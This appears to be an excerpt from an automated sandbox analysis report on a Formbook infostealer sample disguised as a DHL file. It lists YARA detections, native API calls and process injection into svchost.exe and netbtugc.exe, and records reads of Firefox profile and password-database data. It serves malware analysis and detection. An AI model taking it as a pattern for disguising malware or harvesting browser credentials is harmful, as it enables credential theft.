            Source: Yara matchFile source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: rDHL8350232025-2.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: rDHL8350232025-2.exe, 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_66c67aac-5
            Source: rDHL8350232025-2.exe, 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ec335951-a
            Source: rDHL8350232025-2.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e7b97c85-6
            Source: rDHL8350232025-2.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6bb34b09-8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042B363 NtClose, 2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B60 NtClose,LdrInitializeThunk, 2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk, 2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03674340 NtSetContextThread, 2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03674650 NtSuspendThread, 2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672BE0 NtQueryValueKey, 2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672BF0 NtAllocateVirtualMemory, 2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672BA0 NtEnumerateValueKey, 2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B80 NtQueryInformationFile, 2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672AF0 NtWriteFile, 2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672AD0 NtReadFile, 2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672AB0 NtWaitForSingleObject, 2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672F60 NtCreateProcessEx, 2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672F30 NtCreateSection, 2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672FE0 NtCreateFile, 2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672FA0 NtQuerySection, 2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672FB0 NtResumeThread, 2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672F90 NtProtectVirtualMemory, 2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672E30 NtWriteVirtualMemory, 2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672EE0 NtQueueApcThread, 2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672EA0 NtAdjustPrivilegesToken, 2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672E80 NtReadVirtualMemory, 2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672D30 NtUnmapViewOfSection, 2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672D00 NtSetInformationFile, 2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672D10 NtMapViewOfSection, 2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672DD0 NtDelayExecution, 2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672DB0 NtEnumerateKey, 2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C60 NtCreateKey, 2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C00 NtQueryInformationProcess, 2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672CF0 NtOpenProcess, 2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672CC0 NtQueryVirtualMemory, 2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672CA0 NtQueryInformationToken, 2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673010 NtOpenDirectoryObject, 2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673090 NtSetValueKey, 2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036739B0 NtGetContextThread, 2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673D70 NtOpenThread, 2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03673D10 NtOpenProcessToken, 2_2_03673D10
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E24340 NtSetContextThread,LdrInitializeThunk, 4_2_02E24340
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E24650 NtSuspendThread,LdrInitializeThunk, 4_2_02E24650
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22AF0 NtWriteFile,LdrInitializeThunk, 4_2_02E22AF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22AD0 NtReadFile,LdrInitializeThunk, 4_2_02E22AD0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22BE0 NtQueryValueKey,LdrInitializeThunk, 4_2_02E22BE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_02E22BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22BA0 NtEnumerateValueKey,LdrInitializeThunk, 4_2_02E22BA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22B60 NtClose,LdrInitializeThunk, 4_2_02E22B60
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22EE0 NtQueueApcThread,LdrInitializeThunk, 4_2_02E22EE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22E80 NtReadVirtualMemory,LdrInitializeThunk, 4_2_02E22E80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22FE0 NtCreateFile,LdrInitializeThunk, 4_2_02E22FE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22FB0 NtResumeThread,LdrInitializeThunk, 4_2_02E22FB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22F30 NtCreateSection,LdrInitializeThunk, 4_2_02E22F30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_02E22CA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22C60 NtCreateKey,LdrInitializeThunk, 4_2_02E22C60
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_02E22C70
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_02E22DF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22DD0 NtDelayExecution,LdrInitializeThunk, 4_2_02E22DD0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22D30 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_02E22D30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_02E22D10
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E235C0 NtCreateMutant,LdrInitializeThunk, 4_2_02E235C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E239B0 NtGetContextThread,LdrInitializeThunk, 4_2_02E239B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22AB0 NtWaitForSingleObject, 4_2_02E22AB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22B80 NtQueryInformationFile, 4_2_02E22B80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22EA0 NtAdjustPrivilegesToken, 4_2_02E22EA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22E30 NtWriteVirtualMemory, 4_2_02E22E30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22FA0 NtQuerySection, 4_2_02E22FA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22F90 NtProtectVirtualMemory, 4_2_02E22F90
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22F60 NtCreateProcessEx, 4_2_02E22F60
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22CF0 NtOpenProcess, 4_2_02E22CF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22CC0 NtQueryVirtualMemory, 4_2_02E22CC0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22C00 NtQueryInformationProcess, 4_2_02E22C00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22DB0 NtEnumerateKey, 4_2_02E22DB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E22D00 NtSetInformationFile, 4_2_02E22D00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E23090 NtSetValueKey, 4_2_02E23090
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E23010 NtOpenDirectoryObject, 4_2_02E23010
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E23D70 NtOpenThread, 4_2_02E23D70
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02E23D10 NtOpenProcessToken, 4_2_02E23D10
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00477920 NtCreateFile, 4_2_00477920
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00477A70 NtReadFile, 4_2_00477A70
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00477B50 NtDeleteFile, 4_2_00477B50
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00477BE0 NtClose, 4_2_00477BE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00477D30 NtAllocateVirtualMemory, 4_2_00477D30
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_0009D5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_0009D5EB
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00091201
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_0009E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_0009E8F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E5EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02DDB970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E25130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E6F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E37E54 appears 111 times
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: String function: 0004F9F2 appears 40 times
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: String function: 00039CB3 appears 31 times
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: String function: 00050A30 appears 46 times
            Source: rDHL8350232025-2.exe, 00000000.00000003.2011482929.0000000003AF3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs rDHL8350232025-2.exe
            Source: rDHL8350232025-2.exe, 00000000.00000003.2011601383.0000000003C9D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs rDHL8350232025-2.exe
            Source: rDHL8350232025-2.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/7
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000A37B5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000910BF AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe File created: C:\Users\user\AppData\Local\Temp\totten
            Source: rDHL8350232025-2.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000004.00000002.4461436648.000000000071B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4461436648.0000000000712000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4461436648.000000000073E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2335239181.0000000000712000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOIN0#oENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rDHL8350232025-2.exe ReversingLabs: Detection: 52%
            Source: unknown Process created: C:\Users\user\Desktop\rDHL8350232025-2.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: wsock32.dll
